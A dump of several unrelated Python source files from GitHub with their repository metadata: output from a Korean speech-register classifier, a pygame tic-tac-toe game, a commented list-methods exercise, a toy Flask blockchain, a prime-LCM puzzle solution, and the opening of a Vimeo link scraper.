[[3446, 25, 1, 1, 1]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 3446 25 1 1 1]]\n이렇게 말했나요? 는 88.07 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말하지요\n토큰화: ['이렇', '게', '말하', '지요']\n불용어 제거: ['이렇', '게', '말하', '지요']\n정수 인코딩: [[3446, 25, 1, 1]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 0 3446 25 1 1]]\n이렇게 말하지요 는 94.75 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말해보세요\n토큰화: ['이렇', '게', '말하', '어', '보', '세요']\n불용어 제거: ['이렇', '게', '말하', '보', '세요']\n정수 인코딩: [[3446, 25, 1, 1, 385, 3216]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 3446 25 1 1 385 3216]]\n이렇게 말해보세요 는 68.63 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말한 거에요\n토큰화: ['이렇', '게', '말', '하', 'ㄴ', '거', '에', '요']\n불용어 제거: ['이렇', '게', '말', 'ㄴ', '거', '요']\n정수 인코딩: [[3446, 25, 26, 1, 1, 2, 1, 7]]\n패딩: [[ 0 0 0 0 0 0 0 3446 25 26 1 1 2 1 7]]\n이렇게 말한 거에요 는 100.00 % 확률로 존댓말입니다.\n\n한글만 남기기: 이렇게 말하지 마시오\n토큰화: ['이렇', '게', '말하', '지', '마시', '오']\n불용어 제거: ['이렇', '게', '말하', '지', '마시']\n정수 인코딩: [[3446, 25, 1, 155, 1, 1]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 3446 25 1 155 1 1]]\n이렇게 말하지 마시오 는 94.38 % 확률로 반말입니다.\n\n한글만 남기기: 이렇게 말하죠\n토큰화: ['이렇', '게', '말하', '죠']\n불용어 제거: ['이렇', '게', '말하', '죠']\n정수 인코딩: [[3446, 25, 1, 453]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 0 3446 25 1 453]]\n이렇게 말하죠 는 97.83 % 확률로 존댓말입니다.\n\n한글만 남기기: 이렇게 말했죠\n토큰화: ['이렇', '게', '말하', '었', '죠']\n불용어 제거: ['이렇', '게', '말하', '었', '죠']\n정수 인코딩: [[3446, 25, 1, 1, 453]]\n패딩: [[ 0 0 0 0 0 0 0 0 0 0 3446 25 1 1 453]]\n이렇게 말했죠 는 98.92 % 확률로 존댓말입니다.\n\n'''","repo_name":"YoungriKIM/Classify_up_down_text","sub_path":"YUGYO Machine/p_06_preprocessing_check.py","file_name":"p_06_preprocessing_check.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39682420491","text":"import sys\r\nimport numpy as np\r\nimport pygame\r\n\r\nBACKGROUND_COLOR = (80, 133, 199)\r\nLINE_COLOR = (80, 160, 199)\r\nLINE_WIDTH = 10\r\nB_WIDTH = 600\r\nB_HEIGHT = 600\r\nB_ROWS = 3\r\nB_COlS = 3\r\nCIRCLE_RAD = 60\r\nCIRCLE_WIDTH = 15\r\nCIRCLE_COLOR = (239, 231, 200)\r\nCROSS_WIDTH = 25\r\nCROSS_COLOR = (66, 66, 66)\r\nSPACE = 55\r\nSQUARE_SIZE = 200\r\nSCREEN_WIDTH = B_COlS * SQUARE_SIZE\r\nSCREEN_HEIGHT = B_ROWS * SQUARE_SIZE\r\n\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n # initializing pygame\r\n pygame.init()\r\n self.play_background_music()\r\n self.surface = pygame.display.set_mode(size=(B_WIDTH, 100 + B_HEIGHT))\r\n # Change the color of the background\r\n pygame.display.set_caption('TIC TAC TOE')\r\n self.surface.fill(BACKGROUND_COLOR)\r\n self.draw_lines()\r\n self.board = np.zeros((B_ROWS, B_COlS))\r\n pygame.display.flip()\r\n\r\n # Plays continouse music\r\n def play_background_music(self):\r\n pygame.mixer.music.load(\"Resources/Tic Tac Toe Glow OST.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n # Play only once\r\n def play_sound(self, sound):\r\n sound = pygame.mixer.Sound(f\"Resources/{sound}.mp3\")\r\n pygame.mixer.Sound.play(sound)\r\n\r\n def render_background(self):\r\n self.surface = pygame.display.set_mode(size=(B_WIDTH, B_HEIGHT))\r\n # Change the color of the background\r\n pygame.display.set_caption('TIC TAC TOE')\r\n self.surface.fill(BACKGROUND_COLOR)\r\n pygame.display.flip()\r\n\r\n ####### Check Board statuses #######\r\n def mark_square(self, row_n, col_n, player):\r\n self.board[row_n][col_n] = player\r\n\r\n def is_sqaure_available(self, row_n, col_n):\r\n return self.board[row_n][col_n] == 0\r\n\r\n def is_board_full(self):\r\n for row in range(B_ROWS):\r\n for col in range(B_COlS):\r\n if self.board[row][col] == 0:\r\n return False\r\n return True\r\n\r\n ######### Playing Game ##########\r\n def play_game(self):\r\n win = False\r\n running = True\r\n player = 1\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN and not win:\r\n # rounding values to square slots\r\n mouseX_colval = int(event.pos[0] // 200)\r\n mouseY_rowval = int(event.pos[1] // 200)\r\n\r\n if self.is_sqaure_available(mouseY_rowval, mouseX_colval):\r\n self.mark_square(mouseY_rowval, mouseX_colval, player)\r\n\r\n if np.count_nonzero(self.board) == 9:\r\n self.show_board_full()\r\n\r\n if self.check_win(player):\r\n self.show_game_over(player)\r\n win = True\r\n player = player % 2 + 1\r\n self.draw_figures(self.board)\r\n pygame.display.flip()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n pygame.mixer.music.unpause()\r\n self.reset()\r\n win = False\r\n\r\n if event.key == pygame.K_ESCAPE:\r\n exit(0)\r\n\r\n # pygame.display.update()\r\n\r\n ########### Drawing Lines, Crosses and Circles ##########\r\n def draw_lines(self):\r\n for i in range(1, 4):\r\n # Horizontal Lines\r\n pygame.draw.line(self.surface, LINE_COLOR, (0, SQUARE_SIZE * i), (B_WIDTH, SQUARE_SIZE * i), LINE_WIDTH)\r\n # Vertical Lines\r\n pygame.draw.line(self.surface, LINE_COLOR, (SQUARE_SIZE * i, 0), (SQUARE_SIZE * i, B_HEIGHT), LINE_WIDTH)\r\n\r\n def draw_figures(self, board):\r\n for row in range(B_ROWS):\r\n for col in range(B_COlS):\r\n if board[row][col] == 1:\r\n pygame.draw.circle(self.surface, CIRCLE_COLOR, (\r\n int(col * SQUARE_SIZE + SQUARE_SIZE / 2), int(row * SQUARE_SIZE + SQUARE_SIZE / 2)), CIRCLE_RAD,\r\n CIRCLE_WIDTH)\r\n elif board[row][col] == 2:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (col * SQUARE_SIZE + SPACE, row * SQUARE_SIZE + SPACE), (col * SQUARE_SIZE + SQUARE_SIZE - SPACE, row * SQUARE_SIZE + SQUARE_SIZE - SPACE), CROSS_WIDTH)\r\n pygame.draw.line(self.surface, CROSS_COLOR, (col * SQUARE_SIZE + SPACE, row * SQUARE_SIZE + SQUARE_SIZE - SPACE), (col * SQUARE_SIZE + SQUARE_SIZE - SPACE, row * SQUARE_SIZE + SPACE), CROSS_WIDTH)\r\n\r\n ######### Check Winning and Draw Lines #########\r\n def check_win(self, player):\r\n ver_win = self.check_vertical_win(player)\r\n hor_win = self.check_horizontal_win(player)\r\n diag_win = self.check_diagonal_win(player)\r\n pygame.display.flip()\r\n\r\n if ver_win or hor_win or diag_win:\r\n return True\r\n else:\r\n return False\r\n\r\n def check_vertical_win(self, player):\r\n for col in range(B_COlS):\r\n if self.board[0][col] == player and self.board[1][col] == player and self.board[2][col] == player:\r\n self.draw_vertical_winning_line(col, player)\r\n return True\r\n\r\n return False\r\n\r\n def check_horizontal_win(self, player):\r\n for row in range(B_ROWS):\r\n if self.board[row][0] == player and self.board[row][1] == player and self.board[row][2] == player:\r\n self.draw_horizontal_winning_line(row, player)\r\n return True\r\n\r\n return False\r\n\r\n def check_diagonal_win(self, player):\r\n if self.board[0][0] == player and self.board[1][1] == player and self.board[2][2] == player:\r\n self.draw_diagonal_winning_line(player)\r\n return True\r\n elif self.board[2][0] == player and self.board[1][1] == player and self.board[0][2] == player:\r\n self.draw_diagonal_winning_line(player, False)\r\n return True\r\n else:\r\n return False\r\n\r\n def draw_vertical_winning_line(self, col, player):\r\n posX = col * SQUARE_SIZE + SQUARE_SIZE / 2\r\n\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (posX, 10), (posX, SCREEN_HEIGHT - 10), CIRCLE_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (posX, 10), (posX, SCREEN_HEIGHT - 10), CIRCLE_WIDTH)\r\n\r\n def draw_horizontal_winning_line(self, row, player):\r\n posY = row * SQUARE_SIZE + SQUARE_SIZE / 2\r\n\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (10, posY), (SCREEN_WIDTH - 10, posY), CIRCLE_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (10, posY), (SCREEN_WIDTH - 10, posY), CIRCLE_WIDTH)\r\n\r\n def draw_diagonal_winning_line(self, player, down_diag = True):\r\n if down_diag:\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (25, 25), (SCREEN_WIDTH - 25, SCREEN_HEIGHT - 25), CROSS_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (25, 25), (SCREEN_WIDTH - 25, SCREEN_HEIGHT - 25), CROSS_WIDTH)\r\n else:\r\n if player == 1:\r\n pygame.draw.line(self.surface, CIRCLE_COLOR, (25, SCREEN_HEIGHT - 25), (SCREEN_WIDTH - 25, 25), CROSS_WIDTH)\r\n else:\r\n pygame.draw.line(self.surface, CROSS_COLOR, (25, SCREEN_HEIGHT - 25), (SCREEN_WIDTH - 25, 25), CROSS_WIDTH)\r\n\r\n def reset(self):\r\n self.surface.fill(BACKGROUND_COLOR)\r\n self.draw_lines()\r\n self.board = np.zeros((B_ROWS, B_COlS))\r\n pygame.display.flip()\r\n self.play_game()\r\n\r\n def show_game_over(self, player):\r\n font = pygame.font.SysFont('arial', 20)\r\n if player==1:\r\n ln1 = font.render(\"Game is Over!, Player O won the Game \", True, (250, 250, 250))\r\n elif player==2:\r\n ln1 = font.render(\"Game is Over!, Player X won the Game \", True, (250, 250, 250))\r\n self.surface.blit(ln1, (10, 610))\r\n ln2 = font.render(\"To Play again press Enter. To exit press Esc!!!\", True, (250, 250, 250))\r\n self.surface.blit(ln2, (10, 650))\r\n pygame.display.flip()\r\n pygame.mixer.music.pause()\r\n self.play_sound(\"game-over-sound-effect\")\r\n\r\n def show_board_full(self):\r\n font = pygame.font.SysFont('arial', 20)\r\n ln1 = font.render(\"You're out of moves...\", True, (250, 250, 250))\r\n self.surface.blit(ln1, (10, 630))\r\n ln2 = font.render(\"To Play again press Enter. To exit press Esc!!!\", True, (250, 250, 250))\r\n self.surface.blit(ln2, (10, 650))\r\n pygame.display.flip()\r\n pygame.mixer.music.pause()\r\n self.play_sound(\"game-over-sound-effect\")\r\n\r\nif __name__ == '__main__':\r\n game = Game()\r\n game.play_game()\r\n","repo_name":"sandunijayasundara/Tic_Tac_Toe","sub_path":"Tic_Tac_Toe.py","file_name":"Tic_Tac_Toe.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71178442932","text":"lucky_numbers = [4, 8, 15, 16, 23, 42, 7]\nfriends = [\"Alfred\", \"John\", \"Jim\", \"Nike\", \"Mike\", \"James\", \"Jorge\"]\nprint(friends) # just print the item friends' list\nfriends.extend(lucky_numbers) # adding the objects of the lucky numbers list at the end of the friends list\nprint(friends) # because of the previous used comand (friends.extend(lucky_numbers)) the list will be print together with the lucky numbers list in sequence \nfriends.append(\"New\") # it will add the string \"New\" in the actual end of the list\nfriends.insert(1, \"Ben\") # it will add the string \"Ben\" in the index 1 (the string \"John\" and the other will be pushed to the right) ; friends.insert(index, object)\nfriends.remove(\"James\") # it will remove the string \"James\" from the list\nfriends.clear() # remove all the objects from the list\nfriends.pop() # remove the last object from the list (in this case the string \"Jorge\")\nprint(friends.index(\"Nike\")) # show if the object is in the list (if it is not there will be returned a error messege) and in what index number is the object string \"Nike\"\nfriends = [\"Alfred\", \"John\", \"Jim\", \"Jorge\", \"Nike\", \"Mike\", \"James\", \"Jorge\"] # just to rebuild with 2 strings \"Jorge\" (there is anything new here)\nprint(friends.count(\"Jorge\")) # it will print the number of objects like \"Jorge\"\nfriends.sort() # it will sort the list in ascending order (in this case it will be the same as alphabetical order)\nlucky_numbers.sort() # it will sort the list in ascending order (in this case it will be the same as numerical order)\nlucky_numbers.reverse() # it will reverse(inverter) the list\nfriends2 = friends.copy() # create a copy of the friends list (with the same attributes)","repo_name":"bruniculos08/Python-freeCodeCamp","sub_path":"Part10.py","file_name":"Part10.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74915334131","text":"import hashlib\nfrom uuid import uuid4\nimport json\nfrom time import time\nimport requests\n\nfrom flask import Flask, jsonify, request\nfrom textwrap import dedent\n\nsession = requests.session()\n\nclass Blockchain(object):\n def __init__(self):\n self.chain = []\n self.current_transactions = []\n\n # create the genesis (first) block\n self.new_block(previous_hash=1, proof=100)\n\n def new_block(self, proof, previous_hash=None):\n \"\"\"\n Create a new Block in the Blockchain\n :param proof: The proof given by the Proof of Work algorithm\n :param previous_hash: (Optional) Hash of previous Block\n :return: New Block\n \"\"\"\n\n block = {\n 'index': len(self.chain) + 1,\n 'timestamp': time(),\n 'transactions': self.current_transactions,\n 'proof': proof,\n 'previous_hash': previous_hash or self.hash(self.chain[-1]),\n }\n\n # Reset the current list of transactions\n self.current_transactions = []\n\n self.chain.append(block)\n return block\n\n def new_transaction(self, sender, recipient, amount):\n \"\"\"\n Creates a new transaction to go into the next mined Block\n :param sender: Address of the Sender\n :param recipient: Address of the Recipient\n :param amount: Amount\n :return: The index of the Block that will hold this transaction\n \"\"\"\n\n self.current_transactions.append({\n 'sender': sender,\n 'recipient': recipient,\n 'amount': amount,\n })\n\n return self.last_block['index'] + 1\n\n @staticmethod\n def hash(block):\n # Hashes a Block\n \"\"\"\n Creates a SHA-256 hash of a Block\n :param block: Block\n :return: \n \"\"\"\n\n # We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes\n block_string = json.dumps(block, sort_keys=True).encode()\n return hashlib.sha256(block_string).hexdigest()\n\n @property\n def last_block(self):\n # Returns the last Block in the chain\n return self.chain[-1]\n\n @staticmethod\n def valid_proof(last_proof, proof):\n \"\"\"\n Validates the Proof: Does hash(last_proof, proof) contain 4 leading zeroes?\n :param last_proof: Previous Proof\n :param proof: Current Proof\n :return: True if correct, False if not.\n \"\"\"\n\n guess = f'{last_proof}{proof}'.encode()\n guess_hash = hashlib.sha256(guess).hexdigest()\n return guess_hash[:4] == \"0000\"\n\n def proof_of_work(self, last_proof):\n \"\"\"\n Simple Proof of Work Algorithm:\n - Find a number p' such that hash(pp') contains leading 4 zeroes, where p is the previous p'\n - p is the previous proof, and p' is the new proof\n :param last_proof: \n :return: \n \"\"\"\n\n proof = 0\n while self.valid_proof(last_proof, proof) is False:\n proof += 1\n\n return proof\n\napp = Flask(__name__)\n\n# create a unique uuid for this node\nnode_identifier = str(uuid4()).replace('-', '')\n\n# initialize the blockchain\nblockchain = Blockchain()\n\n@app.route('/mine', methods=['GET'])\ndef mine():\n last_block = blockchain.last_block\n last_proof = last_block['proof']\n proof = blockchain.proof_of_work(last_proof)\n\n # we must receive a reward for finding the proof.\n # sender is 0 to show that this node has mined a new coin.\n blockchain.new_transaction(\n sender = \"0\",\n recipient = node_identifier,\n amount = 1\n )\n\n # Forge the new Block by adding it to the full chain\n previous_hash = blockchain.hash(last_block)\n block = blockchain.new_block(proof, previous_hash)\n\n response = {\n 'message': \"New Block Forged\",\n 'index': block['index'],\n 'transactions': block['transactions'],\n 'proof': block['proof'],\n 'previous_hash': block['previous_hash'],\n }\n\n return jsonify(response), 200\n\n@app.route('/transactions/new', methods=['POST'])\ndef new_transaction():\n values = request.get_json();\n\n required = [\"sender\", 'recipient', 'amount']\n if not all(k in values for k in required):\n return 'Missing values', 400\n\n index = blockchain.new_transaction(values[\"sender\"], values[\"recipient\"], values['amount'])\n\n response = {\"message\": f'Transaction will be added to Block {index}'}\n\n return jsonify(response), 201\n\n@app.route('/chain', methods=['GET'])\ndef full_chain():\n response = {\n \"chain\": blockchain.chain,\n \"length\": len(blockchain.chain)\n }\n return jsonify(response), 200\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=5000)\n","repo_name":"zhongeric/mhacks12","sub_path":"blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1867360826","text":"# 소수 최소 공배수\nimport sys\nimport math\n\nN = int(sys.stdin.readline())\nelems = set(list(map(int, sys.stdin.readline().split())))\n\ndef get_prime(e):\n for i in range(2, int(math.sqrt(e))+1):\n if e % i == 0:\n return False\n return True\n\nprimes = []\nprime_lcd = 1\nfor e in elems:\n if get_prime(e):\n primes.append(e)\n prime_lcd *= e\n\nif len(primes) > 0:\n print(prime_lcd)\nelse:\n print(-1)\n","repo_name":"watchstep/TIS-python","sub_path":"BAEKJOON/silver3/21919.py","file_name":"21919.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18604677922","text":"from .html import *\nfrom .utils import *\nimport vimeo_dl as vimeo\nimport random\nimport vlc\n#import time\n\ndef store_vimeo_urls(birds):\n for bird in birds.index:\n print('Getting vimeo links: {:s}'.format(bird))\n filename = get_filename(bird, 'video') + '.txt'\n if os.path.exists(filename):\n continue\n vimeo = get_vimeo_urls(bird)\n if isinstance(vimeo, list):\n save_urls(bird, vimeo, 'video')\n\ndef get_vimeo_urls(bird):\n url = get_bird_url(bird) + 'id/'\n page = get_page(url)\n soup = get_soup(page)\n\n # =========================================\n # Find a link to the media-browser page\n # =========================================\n stop_bool = True\n links = soup.findAll('a')\n for link in links:\n try:\n href = link['href']\n media = 'media-browser' in href\n guide = href[:7] == '/guide/'\n if media and guide:\n ending = href.split('/')[-1]\n if len(ending) == 6:\n url = href\n stop_bool = False\n break\n except:\n continue\n\n # =========================================\n # Boolean check if there were any videos\n # =========================================\n if stop_bool:\n print('No videos for {:s}'.format(bird))\n return\n\n # =========================================\n # Get the content on the media-browser page\n # and find the